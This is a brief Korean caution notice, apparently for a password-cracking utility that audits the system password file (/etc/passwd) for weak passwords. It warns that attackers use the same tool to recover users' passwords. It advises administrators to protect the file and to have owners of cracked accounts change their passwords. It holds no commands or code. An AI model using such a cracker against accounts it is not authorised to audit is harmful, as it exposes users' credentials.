[ 주의사항 ]
이 툴은 해커들이 패스워드를 알아내는 해킹툴로도 많이 사용되는 것이므로 사용에 유의하시기 바랍니다
즉, 보안을 위해 서버관리자가 사용하면 보안도구가 되며, 해커가 사용하면 해킹툴이 됩니다.
이 툴은 시스템에 설치되어 있는 패스워드파일(/etc/passwd)파일의 다음과 같은 점검을 하기위해 사용하는 도구입니다.

위의 주의사항에서 말씀드렸듯이 이 툴은 주로 해커들이 특정시스템의 사용자패스워드를 알아내기 위해 사용되는 것입니다.
따라서 시스템관리자는 패스워드파일(/etc/passwd)파일관리에 만전을 기해야 할 것입니다.
또한 이 툴로 알아낸 패스워드의 소유자(계정소유자)에게 연락하여 패스워드를 알아내기 어려운 패스워드로 변경하라고 조치하셔야합니다. 이 툴로 패스워드를 알 수 있다는 것은 해커들이 너무나 쉽게 알아낼 수 있다는 것과 같은 의미이기 때문입니다.
